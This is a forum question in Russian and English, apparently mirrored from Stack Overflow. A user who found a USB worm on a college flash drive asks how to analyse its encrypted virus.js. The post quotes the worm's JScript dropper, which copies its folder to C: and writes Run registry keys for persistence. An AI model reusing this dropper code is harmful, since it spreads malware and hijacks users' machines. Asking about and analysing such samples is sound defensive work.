Как расшифровать зашифрованный файл вируса JavaScript? [закрыто]Javascript

Форум по Javascript
Anonymous
Как расшифровать зашифрованный файл вируса JavaScript? [закрыто]

Сообщение Anonymous »

Я обнаружил вирус на флэш -накопителе колледжа, который создает «документы» . При открытии он запускает браузер и выполняет следующий скрипт: < /p>

Код: Выделить всё

var FSO = WScript.CreateObject("Scripting.FIleSystemObject");
var WshShell = WScript.CreateObject("Wscript.Shell");
var pt1 = FSO.GetDriveName(WshShell.CurrentDirectory); // Flash drive name
// Open Documents folder and copy the virus to C:
WshShell.Run(pt1 + "\\Document");
FSO.CopyFolder(pt1 + "\\Document\\SystemPC", "C:\\");
// Write to registry for persistence
WshShell.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\prog", "C:\\SystemPC\\prog.js", "REG_SZ");
WshShell.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\onFlash", "C:\\SystemPC\\onFlash.js", "REG_SZ");
// Execute the scripts
WshShell.Run("C:\\SystemPC\\onFlash.js");
WshShell.Run("C:\\SystemPC\\prog.js");
< /code>
Удивительно, но ничего не случилось с моим компьютером. Запуск ATTRIB -H -R -S /S /D G:*< /code> в CMD выявил папку [b] SystemPC < /strong>, содержащая: < /p>
[list]
[*]OnFlash.js
[*] [*] [*]

Код: Выделить всё

unp40590149.tmp
[*]

Код: Выделить всё

virus.js
(двоичный, нечитаемый)
[/list]
Мне нужно проанализировать virus.js , но я не могу прочитать его, используя блокнот ++, разные кодировки , или hxd
scenshot:

Как я могу расшифровать или проанализировать этот файл? p>
What I Tried:[/b]
  • Opened in Notepad++ (various encodings) → unreadable
  • Opened in HxD (hex editor) → binary format
  • Unable to extract using 7zip
Is there a way to decrypt or analyze this encrypted JavaScript file?

Подробнее здесь: https://stackoverflow.com/questions/794 ... virus-file

Вернуться в «Javascript»